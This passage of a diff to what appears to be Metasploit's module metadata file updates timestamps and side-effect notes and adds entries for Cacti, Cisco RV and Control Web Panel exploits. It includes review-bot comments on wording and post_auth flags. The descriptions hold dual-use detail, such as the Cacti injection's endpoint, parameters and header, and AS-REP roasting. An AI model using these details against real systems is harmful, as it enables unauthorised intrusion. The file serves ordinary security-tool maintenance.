"SideEffects": [
"ioc-in-logs",
"artifacts-on-disk"
]
},
"session_types": false,
"needs_cleanup": false
@@ -6744,7 +7099,7 @@
],
"targets": null,
"mod_time": "2021-05-13 04:01:03 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/auxiliary/admin/networking/f5_config.rb",
"is_install_path": true,
"ref_name": "admin/networking/f5_config",
@@ -6752,6 +7107,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
],
"SideEffects": [
],
"Reliability": [
]
},
"session_types": false,
"needs_cleanup": false
@@ -6782,7 +7146,7 @@
],
"targets": null,
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/auxiliary/admin/networking/juniper_config.rb",
"is_install_path": true,
"ref_name": "admin/networking/juniper_config",
@@ -6790,6 +7154,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
],
"SideEffects": [
],
"Reliability": [
]
},
"session_types": false,
"needs_cleanup": false
@@ -6820,7 +7193,7 @@
],
"targets": null,
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/auxiliary/admin/networking/mikrotik_config.rb",
"is_install_path": true,
"ref_name": "admin/networking/mikrotik_config",
@@ -6828,6 +7201,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
],
"SideEffects": [
],
"Reliability": [
]
},
"session_types": false,
"needs_cleanup": false
@@ -6905,7 +7287,7 @@
],
"targets": null,
"mod_time": "2020-12-07 11:02:10 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/auxiliary/admin/networking/vyos_config.rb",
"is_install_path": true,
"ref_name": "admin/networking/vyos_config",
@@ -6913,6 +7295,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": false,
"needs_cleanup": false
@@ -7619,7 +8010,7 @@
"https"
],
"targets": null,
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb",
"is_install_path": true,
"ref_name": "admin/sap/cve_2020_6207_solman_rce",
@@ -7627,6 +8018,16 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"config-changes",
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": false,
"needs_cleanup": false
@@ -7671,7 +8072,7 @@
"https"
],
"targets": null,
"mod_time": "2021-02-24 20:24:57 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/auxiliary/admin/sap/cve_2020_6287_ws_add_user.rb",
"is_install_path": true,
"ref_name": "admin/sap/cve_2020_6287_ws_add_user",
@@ -7681,6 +8082,16 @@
"notes": {
"AKA": [
"RECON"
],
"Stability": [
"crash-safe"
],
"SideEffects": [
"config-changes",
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": false,
@@ -7749,7 +8160,7 @@
"Yvan Genuer",
"Vladimir Ivanov"
],
"description": "This module exploits CVE-2018-2392 and CVE-2018-2393, two XXE vulnerabilities within the XMLCHART page\n of SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53. These\n vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when\n submitting a POST request to the XMLCHART page to generate a new chart.\n\n Successful exploitation will allow unauthenticated remote attackers to read files from the server as the user\n from which the IGS service is started, which will typically be the SAP admin user. Alternatively attackers\n can also abuse the XXE vulnerability to conduct a denial of service attack against the vulnerable\n SAP IGS server.",
"description": "This module exploits CVE-2018-2392 and CVE-2018-2393, two XXE vulnerabilities within the XMLCHART page\n of SAP Internet Graphics Servers (IGS) running versions 7.20, 7.20EXT, 7.45, 7.49, or 7.53. These\n vulnerabilities occur due to a lack of appropriate validation on the Extension HTML tag when\n submitting a POST request to the XMLCHART page to generate a new chart.\n\n Successful exploitation will allow unauthenticated remote attackers to read files from the server as the user\n from which the IGS service is started, which will typically be the SAP admin user. Alternatively attackers\n can also abuse the XXE vulnerability to conduct a denial of service attack against the vulnerable\n SAP IGS server.",
"references": [
"CVE-2018-2392",
"CVE-2018-2393",
@@ -7774,7 +8185,7 @@
"https"
],
"targets": null,
"mod_time": "2021-05-13 04:01:03 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe.rb",
"is_install_path": true,
"ref_name": "admin/sap/sap_igs_xmlchart_xxe",
@@ -7782,6 +8193,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": false,
"needs_cleanup": false
@@ -10900,7 +11320,7 @@
],
"targets": null,
"mod_time": "2021-02-24 20:24:57 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/auxiliary/dos/dns/bind_tsig_badtime.rb",
"is_install_path": true,
"ref_name": "dos/dns/bind_tsig_badtime",
@@ -10908,6 +11328,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-service-down"
],
"SideEffects": [
],
"Reliability": [
]
},
"session_types": false,
"needs_cleanup": false
@@ -11313,7 +11742,7 @@
"https"
],
"targets": null,
"mod_time": "2021-05-13 04:01:03 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/auxiliary/dos/http/cable_haunt_websocket_dos.rb",
"is_install_path": true,
"ref_name": "dos/http/cable_haunt_websocket_dos",
@@ -11321,6 +11750,15 @@
"post_auth": true,
"default_credential": false,
"notes": {
"Stability": [
"crash-service-down"
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": false,
"needs_cleanup": false
@@ -12661,7 +13099,7 @@
],
"targets": null,
"mod_time": "2022-12-09 17:20:13 +0000",
"mod_time": "2023-02-05 12:04:59 +0000",
"path": "/modules/auxiliary/dos/mirageos/qubes_mirage_firewall_dos.rb",
"is_install_path": true,
"ref_name": "dos/mirageos/qubes_mirage_firewall_dos",
@@ -12673,11 +13111,10 @@
"crash-service-down"
],
"Reliability": [
"ioc-in-logs",
"physical-effects"
],
"SideEffects": [
"unreliable-session"
"ioc-in-logs"
]
},
"session_types": false,
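Review bot: this hunk correctly moves "ioc-in-logs" out of Reliability into SideEffects, but "physical-effects", which was also in the wrong category, is dropped altogether rather than moved alongside it; confirm that was intended, since a firewall DoS on a Qubes host arguably still qualifies. Removing "unreliable-session" from SideEffects is right for a module that opens no session, so no change needed there.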
@@ -18598,7 +19035,7 @@
],
"targets": null,
"mod_time": "2021-05-17 17:04:49 +0000",
"mod_time": "2023-01-17 18:59:12 +0000",
"path": "/modules/auxiliary/gather/get_user_spns.py",
"is_install_path": true,
"ref_name": "gather/get_user_spns",
@@ -19595,7 +20032,8 @@
"type": "auxiliary",
"author": [
"Matt Byrne <attackdebris@gmail.com>",
"alanfoster"
"alanfoster",
"sjanusz-r7"
],
"description": "This module will enumerate valid Domain Users via Kerberos from an unauthenticated perspective. It utilizes\n the different responses returned by the service for valid and invalid users.",
"references": [
@@ -19611,12 +20049,12 @@
],
"targets": null,
"mod_time": "2022-04-08 18:45:03 +0000",
"mod_time": "2022-05-27 13:34:10 +0000",
"path": "/modules/auxiliary/gather/kerberos_enumusers.rb",
"is_install_path": true,
"ref_name": "gather/kerberos_enumusers",
"check": false,
"post_auth": false,
"post_auth": true,
"default_credential": false,
"notes": {
},
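Review bot: post_auth flips from false to true for kerberos_enumusers, yet the description a few lines above still says the module enumerates users "from an unauthenticated perspective". If the flip is only a by-product of newly added credential-style datastore options being picked up by the metadata generator, the description should say which options are optional; if the module now genuinely needs a credential, the description is wrong. Either way the two should not disagree in the same entry.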
@@ -19827,7 +20265,7 @@
"author": [
"Grant Willcox"
],
"description": "This module allows users to query an LDAP server using either a custom LDAP query, or\n a set of LDAP queries under a specific category. Users can also specify a JSON or YAML\n file containing custom queries to be executed using the RUN_QUERY_FILE action.\n If this action is specified, then QUERY_FILE_PATH must be a path to the location\n of this JSON/YAML file on disk.\n\n Users can also run a single query by using the RUN_SINGLE_QUERY option and then setting\n the QUERY_FILTER datastore option to the filter to send to the LDAP server and QUERY_ATTRIBUTES\n to a comma seperated string containing the list of attributes they are interested in obtaining\n from the results.\n\n As a third option can run one of several predefined queries by setting ACTION to the\n appropriate value. These options will be loaded from the ldap_queries_default.yaml file\n located in the MSF configuration directory, located by default at ~/.msf4/ldap_queries_default.yaml.\n\n All results will be returned to the user in table, CSV or JSON format, depending on the value\n of the OUTPUT_FORMAT datastore option. The characters || will be used as a delimiter\n should multiple items exist within a single column.",
"description": "This module allows users to query an LDAP server using either a custom LDAP query, or\n a set of LDAP queries under a specific category. Users can also specify a JSON or YAML\n file containing custom queries to be executed using the RUN_QUERY_FILE action.\n If this action is specified, then QUERY_FILE_PATH must be a path to the location\n of this JSON/YAML file on disk.\n\n Users can also run a single query by using the RUN_SINGLE_QUERY option and then setting\n the QUERY_FILTER datastore option to the filter to send to the LDAP server and QUERY_ATTRIBUTES\n to a comma separated string containing the list of attributes they are interested in obtaining\n from the results.\n\n As a third option can run one of several predefined queries by setting ACTION to the\n appropriate value. These options will be loaded from the ldap_queries_default.yaml file\n located in the MSF configuration directory, located by default at ~/.msf4/ldap_queries_default.yaml.\n\n All results will be returned to the user in table, CSV or JSON format, depending on the value\n of the OUTPUT_FORMAT datastore option. The characters || will be used as a delimiter\n should multiple items exist within a single column.",
"references": [
],
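Review bot: the "seperated" to "separated" fix in this hunk is good, but the same description still has a sentence missing its subject: "As a third option can run one of several predefined queries" should read "As a third option, users can run one of several predefined queries"; since this file is generated, that fix belongs in the description string of /modules/auxiliary/gather/ldap_query.rb.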
@@ -19841,7 +20279,7 @@
],
"targets": null,
"mod_time": "2022-12-04 17:41:24 +0000",
"mod_time": "2023-01-24 11:23:28 +0000",
"path": "/modules/auxiliary/gather/ldap_query.rb",
"is_install_path": true,
"ref_name": "gather/ldap_query",
@@ -20742,7 +21180,7 @@
"https"
],
"targets": null,
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/auxiliary/gather/peplink_bauth_sqli.rb",
"is_install_path": true,
"ref_name": "gather/peplink_bauth_sqli",
@@ -20750,6 +21188,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": false,
"needs_cleanup": false
@@ -21065,7 +21512,7 @@
],
"targets": null,
"mod_time": "2021-06-04 10:22:42 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/auxiliary/gather/redis_extractor.rb",
"is_install_path": true,
"ref_name": "gather/redis_extractor",
@@ -21073,6 +21520,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
],
"Reliability": [
]
},
"session_types": false,
"needs_cleanup": false
@@ -21150,7 +21606,7 @@
],
"targets": null,
"mod_time": "2021-04-30 23:26:18 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/auxiliary/gather/saltstack_salt_root_key.rb",
"is_install_path": true,
"ref_name": "gather/saltstack_salt_root_key",
@@ -21163,6 +21619,9 @@
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": false,
@@ -21367,7 +21826,7 @@
"https"
],
"targets": null,
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/auxiliary/gather/shodan_host.rb",
"is_install_path": true,
"ref_name": "gather/shodan_host",
@@ -21375,6 +21834,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
],
"SideEffects": [
],
"Reliability": [
]
},
"session_types": false,
"needs_cleanup": false
@@ -21734,7 +22202,7 @@
"https"
],
"targets": null,
"mod_time": "2021-02-24 20:24:57 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/auxiliary/gather/vbulletin_getindexablecontent_sqli.rb",
"is_install_path": true,
"ref_name": "gather/vbulletin_getindexablecontent_sqli",
@@ -21742,6 +22210,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": false,
"needs_cleanup": false
@@ -21918,7 +22395,7 @@
"microsoft-ds"
],
"targets": null,
"mod_time": "2022-10-13 10:13:27 +0000",
"mod_time": "2022-12-07 23:03:57 +0000",
"path": "/modules/auxiliary/gather/windows_secrets_dump.rb",
"is_install_path": true,
"ref_name": "gather/windows_secrets_dump",
@@ -22403,7 +22880,7 @@
],
"targets": null,
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/auxiliary/gather/zookeeper_info_disclosure.rb",
"is_install_path": true,
"ref_name": "gather/zookeeper_info_disclosure",
@@ -22411,6 +22888,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
],
"Reliability": [
]
},
"session_types": false,
"needs_cleanup": false
@@ -31384,7 +31870,7 @@
"https"
],
"targets": null,
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/auxiliary/scanner/http/limesurvey_zip_traversals.rb",
"is_install_path": true,
"ref_name": "scanner/http/limesurvey_zip_traversals",
@@ -31392,6 +31878,15 @@
"post_auth": true,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": false,
"needs_cleanup": false
@@ -32845,7 +33340,8 @@
"OSVDB-877",
"BID-11604",
"BID-9506",
"BID-9561"
"BID-9561",
"URL-https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/OPTIONS"
],
"platform": "",
"arch": "",
@@ -32866,7 +33362,7 @@
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"mod_time": "2023-01-15 06:37:11 +0000",
"path": "/modules/auxiliary/scanner/http/options.rb",
"is_install_path": true,
"ref_name": "scanner/http/options",
@@ -34670,7 +35166,7 @@
"https"
],
"targets": null,
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/auxiliary/scanner/http/springcloud_directory_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/springcloud_directory_traversal",
@@ -34678,6 +35174,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": false,
"needs_cleanup": false
@@ -35369,7 +35874,7 @@
"https"
],
"targets": null,
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/auxiliary/scanner/http/synology_forget_passwd_user_enum.rb",
"is_install_path": true,
"ref_name": "scanner/http/synology_forget_passwd_user_enum",
@@ -35377,6 +35882,16 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"account-lockouts",
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": false,
"needs_cleanup": false
@@ -37255,7 +37770,7 @@
"https"
],
"targets": null,
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/auxiliary/scanner/http/wp_duplicator_file_read.rb",
"is_install_path": true,
"ref_name": "scanner/http/wp_duplicator_file_read",
@@ -37263,6 +37778,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": false,
"needs_cleanup": false
@@ -38344,7 +38868,7 @@
"https"
],
"targets": null,
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/auxiliary/scanner/http/zenload_balancer_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/zenload_balancer_traversal",
@@ -38352,6 +38876,15 @@
"post_auth": true,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": false,
"needs_cleanup": false
@@ -38772,6 +39305,54 @@
"session_types": false,
"needs_cleanup": false
},
"auxiliary_scanner/kerberos/kerberos_login": {
"name": "Kerberos Authentication Check Scanner",
"fullname": "auxiliary/scanner/kerberos/kerberos_login",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"alanfoster"
],
"description": "This module will test Kerberos logins on a range of machines and\n report successful logins. If you have loaded a database plugin\n and connected to a database this module will record successful\n logins and hosts so you can track your access.\n\n Kerberos accounts which do not require pre-authentication will\n have the TGT logged for offline cracking, this technique is known as AS-REP Roasting.\n\n It is also able to identify whether user accounts are enabled or\n disabled/locked out.",
"references": [
],
"platform": "",
"arch": "",
"rport": 88,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2022-12-14 18:28:16 +0000",
"path": "/modules/auxiliary/scanner/kerberos/kerberos_login.rb",
"is_install_path": true,
"ref_name": "scanner/kerberos/kerberos_login",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
],
"SideEffects": [
"account-lockouts",
"ioc-in-logs"
]
},
"session_types": false,
"needs_cleanup": false
},
"auxiliary_scanner/llmnr/query": {
"name": "LLMNR Query",
"fullname": "auxiliary/scanner/llmnr/query",
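Review bot: two wording points in the kerberos_login description added here. "will have the TGT logged for offline cracking, this technique is known as AS-REP Roasting" is a comma splice, and what is captured for offline cracking is the encrypted part of the AS-REP (encrypted under the user's long-term key), not the TGT itself, so "will have the AS-REP response logged for offline cracking; this technique is known as AS-REP Roasting" would be both grammatical and accurate. The notes block is otherwise well filled in; "account-lockouts" is the right side effect to declare for a password-spraying scanner.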
@@ -40288,7 +40869,7 @@
"sybase"
],
"targets": null,
"mod_time": "2021-08-31 17:10:07 +0000",
"mod_time": "2023-01-24 14:30:39 +0000",
"path": "/modules/auxiliary/scanner/mssql/mssql_login.rb",
"is_install_path": true,
"ref_name": "scanner/mssql/mssql_login",
@@ -45616,7 +46197,7 @@
],
"targets": null,
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/auxiliary/scanner/scada/modbus_banner_grabbing.rb",
"is_install_path": true,
"ref_name": "scanner/scada/modbus_banner_grabbing",
@@ -45624,6 +46205,15 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": false,
"needs_cleanup": false
@@ -46440,7 +47030,7 @@
"microsoft-ds"
],
"targets": null,
"mod_time": "2023-01-09 11:23:26 +0000",
"mod_time": "2023-01-13 17:31:02 +0000",
"path": "/modules/auxiliary/scanner/smb/smb_enumshares.rb",
"is_install_path": true,
"ref_name": "scanner/smb/smb_enumshares",
@@ -46564,7 +47154,7 @@
"microsoft-ds"
],
"targets": null,
"mod_time": "2021-08-31 17:10:07 +0000",
"mod_time": "2023-01-24 14:30:39 +0000",
"path": "/modules/auxiliary/scanner/smb/smb_login.rb",
"is_install_path": true,
"ref_name": "scanner/smb/smb_login",
@@ -46746,7 +47336,7 @@
"microsoft-ds"
],
"targets": null,
"mod_time": "2023-01-12 09:29:53 +0000",
"mod_time": "2023-01-25 13:58:29 +0000",
"path": "/modules/auxiliary/scanner/smb/smb_version.rb",
"is_install_path": true,
"ref_name": "scanner/smb/smb_version",
@@ -50083,7 +50673,7 @@
"winrm"
],
"targets": null,
"mod_time": "2021-01-28 10:35:25 +0000",
"mod_time": "2022-11-30 11:32:23 +0000",
"path": "/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb",
"is_install_path": true,
"ref_name": "scanner/winrm/winrm_auth_methods",
@@ -50133,7 +50723,7 @@
"winrm"
],
"targets": null,
"mod_time": "2021-09-10 15:13:30 +0000",
"mod_time": "2023-01-24 14:30:39 +0000",
"path": "/modules/auxiliary/scanner/winrm/winrm_cmd.rb",
"is_install_path": true,
"ref_name": "scanner/winrm/winrm_cmd",
@@ -50184,7 +50774,7 @@
"winrm"
],
"targets": null,
"mod_time": "2021-09-24 12:01:30 +0000",
"mod_time": "2023-01-24 14:30:39 +0000",
"path": "/modules/auxiliary/scanner/winrm/winrm_login.rb",
"is_install_path": true,
"ref_name": "scanner/winrm/winrm_login",
@@ -50234,12 +50824,12 @@
"winrm"
],
"targets": null,
"mod_time": "2021-01-28 10:35:25 +0000",
"mod_time": "2023-01-03 19:54:06 +0000",
"path": "/modules/auxiliary/scanner/winrm/winrm_wql.rb",
"is_install_path": true,
"ref_name": "scanner/winrm/winrm_wql",
"check": false,
"post_auth": true,
"post_auth": false,
"default_credential": false,
"notes": {
},
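Review bot: post_auth flips from true to false for winrm_wql, but running a WQL query over WinRM requires a credential, so this looks like the metadata generator no longer seeing the module's credential options (for example after they moved into a shared mixin) rather than a real change in behaviour. Worth checking how post_auth is derived for this module before landing, since the neighbouring winrm_cmd and winrm_login entries in this series only change mod_time.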
@@ -52008,7 +52598,7 @@
],
"targets": null,
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/auxiliary/server/teamviewer_uri_smb_redirect.rb",
"is_install_path": true,
"ref_name": "server/teamviewer_uri_smb_redirect",
@@ -52016,8 +52606,14 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": false,
@@ -52693,7 +53289,7 @@
"https"
],
"targets": null,
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-03 18:12:53 +0000",
"path": "/modules/auxiliary/sqli/dlink/dlink_central_wifimanager_sqli.rb",
"is_install_path": true,
"ref_name": "sqli/dlink/dlink_central_wifimanager_sqli",
@@ -52701,6 +53297,16 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"config-changes",
"ioc-in-logs"
],
"Reliability": [
]
},
"session_types": false,
"needs_cleanup": false
@@ -57172,7 +57778,7 @@
"targets": [
"Automatic"
],
"mod_time": "2020-07-18 23:31:34 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb",
"is_install_path": true,
"ref_name": "freebsd/local/intel_sysret_priv_esc",
@@ -57228,7 +57834,7 @@
"FreeBSD 12.0-RELEASE r341666",
"FreeBSD 12.1-RELEASE r354233"
],
"mod_time": "2021-08-27 17:15:33 +0000",
"mod_time": "2023-02-02 18:45:43 +0000",
"path": "/modules/exploits/freebsd/local/ip6_setpktopt_uaf_priv_esc.rb",
"is_install_path": true,
"ref_name": "freebsd/local/ip6_setpktopt_uaf_priv_esc",
@@ -57236,6 +57842,9 @@
"post_auth": false,
"default_credential": false,
"notes": {
"Reliability": [
"repeatable-session"
],
"Stability": [
"crash-os-restarts"
],
@@ -57336,7 +57945,7 @@
"targets": [
"Automatic"
],
"mod_time": "2020-08-24 11:47:50 +0000",
"mod_time": "2023-02-02 18:17:02 +0000",
"path": "/modules/exploits/freebsd/local/rtld_execl_priv_esc.rb",
"is_install_path": true,
"ref_name": "freebsd/local/rtld_execl_priv_esc",
@@ -58944,7 +59553,7 @@
"targets": [
"Linux Dropper"
],
"mod_time": "2022-02-25 11:34:31 +0000",
"mod_time": "2023-02-08 15:20:32 +0000",
"path": "/modules/exploits/linux/http/axis_app_install.rb",
"is_install_path": true,
"ref_name": "linux/http/axis_app_install",
@@ -59210,6 +59819,72 @@
"session_types": false,
"needs_cleanup": true
},
"exploit_linux/http/cacti_unauthenticated_cmd_injection": {
"name": "Cacti 1.2.22 unauthenticated command injection",
"fullname": "exploit/linux/http/cacti_unauthenticated_cmd_injection",
"aliases": [
],
"rank": 600,
"disclosure_date": "2022-12-05",
"type": "exploit",
"author": [
"Stefan Schiller",
"Steven Seeley",
"Owen Gong",
"Erik Wynter"
],
"description": "This module exploits an unauthenticated command injection\n vulnerability in Cacti through 1.2.22 (CVE-2022-46169) in\n order to achieve unauthenticated remote code execution as the\n www-data user.\n\n The module first attempts to obtain the Cacti version to see\n if the target is affected. If LOCAL_DATA_ID and/or HOST_ID\n are not set, the module will try to bruteforce the missing\n value(s). If a valid combination is found, the module will\n use these to attempt exploitation. If LOCAL_DATA_ID and/or\n HOST_ID are both set, the module will immediately attempt\n exploitation.\n\n During exploitation, the module sends a GET request to\n /remote_agent.php with the action parameter set to polldata\n and the X-Forwarded-For header set to the provided value for\n X_FORWARDED_FOR_IP (by default 127.0.0.1). In addition, the\n poller_id parameter is set to the payload and the host_id\n and local_data_id parameters are set to the bruteforced or\n provided values. If X_FORWARDED_FOR_IP is set to an address\n that is resolvable to a hostname in the poller table, and the\n local_data_id and host_id values are vulnerable, the payload\n set for poller_id will be executed by the target.\n\n This module has been successfully tested against Cacti\n version 1.2.22 running on Ubuntu 21.10 (vulhub docker image)",
"references": [
"CVE-2022-46169",
"URL-https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf",
"URL-https://github.com/vulhub/vulhub/tree/master/cacti/CVE-2022-46169",
"URL-https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution"
],
"platform": "Linux,Unix",
"arch": "cmd, x86, x64",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic (Unix In-Memory)",
"Automatic (Linux Dropper)"
],
"mod_time": "2023-01-23 11:53:19 +0000",
"path": "/modules/exploits/linux/http/cacti_unauthenticated_cmd_injection.rb",
"is_install_path": true,
"ref_name": "linux/http/cacti_unauthenticated_cmd_injection",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
],
"Reliability": [
"repeatable-session"
]
},
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/cayin_cms_ntp": {
"name": "Cayin CMS NTP Server RCE",
"fullname": "exploit/linux/http/cayin_cms_ntp",
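Review bot: the new description in this hunk contradicts itself: after saying that missing LOCAL_DATA_ID and/or HOST_ID values are bruteforced, it continues "If LOCAL_DATA_ID and/or HOST_ID are both set, the module will immediately attempt exploitation", which mixes "and/or" with "both". Since this file is generated, the wording belongs in the module's Description in cacti_unauthenticated_cmd_injection.rb, e.g. "If both LOCAL_DATA_ID and HOST_ID are set, the module will immediately attempt exploitation."; the final sentence ("...running on Ubuntu 21.10 (vulhub docker image)") is also missing its closing period.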
@@ -59843,6 +60518,71 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/cisco_rv340_lan": {
"name": "Cisco RV Series Authentication Bypass and Command Injection",
"fullname": "exploit/linux/http/cisco_rv340_lan",
"aliases": [
],
"rank": 600,
"disclosure_date": "2021-11-02",
"type": "exploit",
"author": [
"Biem Pham",
"Neterum",
"jbaines-r7"
],
"description": "This module exploits two vulnerabilities, a session ID directory traversal authentication\n bypass (CVE-2022-20705) and a command injection vulnerability (CVE-2022-20707), on Cisco RV160, RV260, RV340,\n and RV345 Small Business Routers, allowing attackers to execute arbitrary commands with www-data user privileges.\n This access can then be used to pivot to other parts of the network. This module works on firmware\n versions 1.0.03.24 and below.",
"references": [
"CVE-2022-20705",
"CVE-2022-20707",
"ZDI-22-410",
"ZDI-22-411"
],
"platform": "Linux,Unix",
"arch": "cmd, armle",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Unix Command",
"Linux Dropper"
],
"mod_time": "2023-02-13 17:49:09 +0000",
"path": "/modules/exploits/linux/http/cisco_rv340_lan.rb",
"is_install_path": true,
"ref_name": "linux/http/cisco_rv340_lan",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"Stability": [
"crash-safe"
],
"Reliability": [
"repeatable-session"
],
"SideEffects": [
"ioc-in-logs",
"artifacts-on-disk"
]
},
"session_types": false,
"needs_cleanup": true
},
"exploit_linux/http/cisco_rv_series_authbypass_and_rce": {
"name": "Cisco Small Business RV Series Authentication Bypass and Command Injection",
"fullname": "exploit/linux/http/cisco_rv_series_authbypass_and_rce",
@@ -60028,6 +60768,69 @@
"session_types": false,
"needs_cleanup": null
},
"exploit_linux/http/control_web_panel_login_cmd_exec": {
"name": "CWP login.php Unauthenticated RCE",
"fullname": "exploit/linux/http/control_web_panel_login_cmd_exec",
"aliases": [
],
"rank": 600,
"disclosure_date": "2023-01-05",
"type": "exploit",
"author": [
"Spencer McIntyre",
"Numan Türle"
],
"description": "Control Web Panel versions < 0.9.8.1147 are vulnerable to\n unauthenticated OS command injection. Successful exploitation results\n in code execution as the root user. The results of the command are not\n contained within the HTTP response and the request will block while\n the command is running.",
"references": [
"CVE-2022-44877",
"URL-https://github.com/numanturle/CVE-2022-44877",
"URL-https://control-webpanel.com/changelog#1674073133745-84af1b53-c121"
],
"platform": "Linux,Unix",
"arch": "cmd, x86, x64",
"rport": 2031,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Unix Command",
"Linux Dropper"
],
"mod_time": "2023-01-25 13:45:18 +0000",
